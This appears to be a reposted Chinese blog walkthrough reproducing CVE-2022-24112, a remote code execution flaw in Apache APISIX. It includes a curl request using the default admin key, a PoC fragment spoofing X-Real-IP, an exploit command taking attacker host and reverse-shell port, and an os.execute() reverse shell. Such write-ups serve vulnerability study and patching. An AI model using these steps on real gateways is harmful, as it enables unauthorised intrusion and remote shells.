本文介绍: 如果用户使用 Apache APISIX 默认配置启用 Admin API ,使用默认 Admin Key没有额外分配管理端口),攻击者可以通过 batchrequests 插件调用 Admin API ,导致远代码执行。Apache APISIX 是 Apache 软件基金会下的云原生 API 网关,它兼具动态实时高性能等特点,提供了负载均衡动态上游、灰度发布(金丝雀发布)、服务熔断身份认证、可观测性等丰富的流量管理功能登陆后台可以看到添加一条路由列表,在。

在这里插入图片描述

CVE-2022-24112 Apache APISIX 命令执行漏洞

Apache APISIX 是 Apache 软件基金会下的云原生 API 网关,它兼具动态实时高性能等特点,提供了负载均衡、动态上游、灰度发布(金丝雀发布)、服务熔断身份认证、可观测性等丰富的流量管理功能

在启用 Apache APISIX batchrequests 插件后,攻击者通过 batchrequests 插件绕过 Apache APISIX 数据面板的 IP 限制(如绕过 IP 黑白名单限制)。如果用户使用 Apache APISIX 默认配置(启用 Admin API ,使用默认 Admin Key 且没有额外分配管理端口),攻击者可以通过 batchrequests 插件调用 Admin API ,导致远代码执行

漏洞环境CVE-2022-24112:Apache APISIX 命令执行漏洞

环境启动访问 9000 端口,可以使用 curl 命令确认漏洞存在

ocean@OceandeMBP ~ % curl 'http://192.168.186.148:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Fri, 24 Mar 2023 03:27:45 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600

{"action":"get","count":0,"node":{"dir":true,"key":"/apisix/routes","nodes":{}}}

pochttps://github.com/twseptian/cve-2022-24112

poc 主要的思路就是通过传参绕过IP校验 + 使用默认API KEY值调用Admin API

        json_data = {
            'headers': {
                'X-Real-IP': '{}:8080'.format(target_ip),
                'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
                'Content-Type': 'application/json',
            }

然后使用PUT请求添加路由触发filter_func()执行其中的lua代码利用上述EXP进行攻击,命令格式如下

python3 exp.py -t 受害者主机 -p 服务运行端口 -L 攻击者主机 -P 接受反弹Shell端口

截屏2023-03-24 11.47.38

Apisix 后台密码存储api/conf/conf.yaml 文件中,可以通过命令执行读取文件拿到

截屏2023-03-24 11.52.52

登陆后台可以看到其添加一条路由列表,在filter_func()函数中,调用lua系统目录执行语句os.execute()进行反弹shell

截屏2023-03-24 11.54.21
在这里插入图片描述

原文地址:https://blog.csdn.net/q20010619/article/details/130010983

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_37310.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注